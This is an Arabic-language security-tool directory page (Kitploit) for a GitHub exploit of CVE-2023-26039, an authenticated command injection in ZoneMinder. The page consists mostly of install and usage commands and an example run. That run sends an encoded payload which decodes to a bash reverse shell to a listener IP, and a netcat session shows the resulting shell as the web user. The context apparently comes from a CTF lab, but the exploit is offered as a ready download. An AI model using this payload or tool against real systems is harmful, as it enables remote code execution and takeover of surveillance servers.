Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-26039 — CVE-2023-26039 - ZoneMinder. يمكن لأي مستخدم مُصادَق عليه إنشاء أمر API لتنفيذ أي أمر shell بصلاحيات مستخدم الويب. | Kitploit
أدوات/GitHubGitHub/ungabunga-ctf/cve-2023-26039
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubungabunga-ctf/cve-2023-26039

CVE-2023-26039

CVE-2023-26039 - ZoneMinder. يمكن لأي مستخدم مُصادَق عليه إنشاء أمر API لتنفيذ أي أمر shell بصلاحيات مستخدم الويب.

عرض المستودع
14منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-26039

الوصف

ZoneMinder هو تطبيق برمجي مجاني ومفتوح المصدر لكاميرات المراقبة التلفزيونية المغلقة (CCTV) يعمل على لينكس ويدعم كاميرات IP وكاميرات USB والكاميرات التناظرية. الإصدارات السابقة لـ 1.36.33 و1.37.33 تحتوي على ثغرة حقن أوامر نظام التشغيل عبر daemonControl() في /web/api/app/Controller/HostController.php. يمكن لأي مستخدم مصادق إنشاء أمر API لتنفيذ أي أمر شل بصلاحية مستخدم الويب. تم إصلاح هذه المشكلة في الإصدارين 1.36.33 و1.37.33.

التثبيت

root@kitploit:~
git clone https://github.com/ungabunga-ctf/CVE-2023-26039
cd CVE-2023-26039
python3 -m venv venv
source venv/bin/activate
pip install requests
python3 CVE-2023-26039.py

التشغيل

root@kitploit:~
python3 CVE-2023-26039.py
usage: CVE-2023-26039.py [-h] -t TARGET -u USERNAME -p PASSWORD [-c CMD] [-lh LHOST] [-lp LPORT]
CVE-2023-26039.py: error: the following arguments are required: -t/--target, -u/--username, -p/--password

مثال

شغّل هذا في الطرفية الأولى

root@kitploit:~
python3 CVE-2023-26039.py -t http://localhost:8080 -u admin -p starcraft122490 -lh 10.10.15.8 -lp 4444
[+] Got token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJab25lTWluZGVyIiwiaWF0IjoxNzg0MzI4MzU3LCJleHAiOjE3ODQzMzU1NTcsInVzZXIiOiJhZG1pbiIsInR5cGUiOiJhY2Nlc3MifQ.BxB6EGkAyc_eaTg4JMYsbLqgmTCu-vh40l8HOoTNHcM...
http://localhost:8080/api/host/daemonControl/zmdc.pl.pl/%24%28echo%20%22YmFzaCAtYyAnYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNS44LzQ0NDQgMD4mMSc%3D%22%7Cbase64%20-d%7Cbash%29.json

وهذا في الطرفية الثانية

root@kitploit:~
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.8] from (UNKNOWN) [10.129.230.42] 59380
bash: cannot set terminal process group (1080): Inappropriate ioctl for device
bash: no job control in this shell
zoneminder@surveillance:/usr/share/zoneminder/www/api/app/webroot$
تنزيل الأداة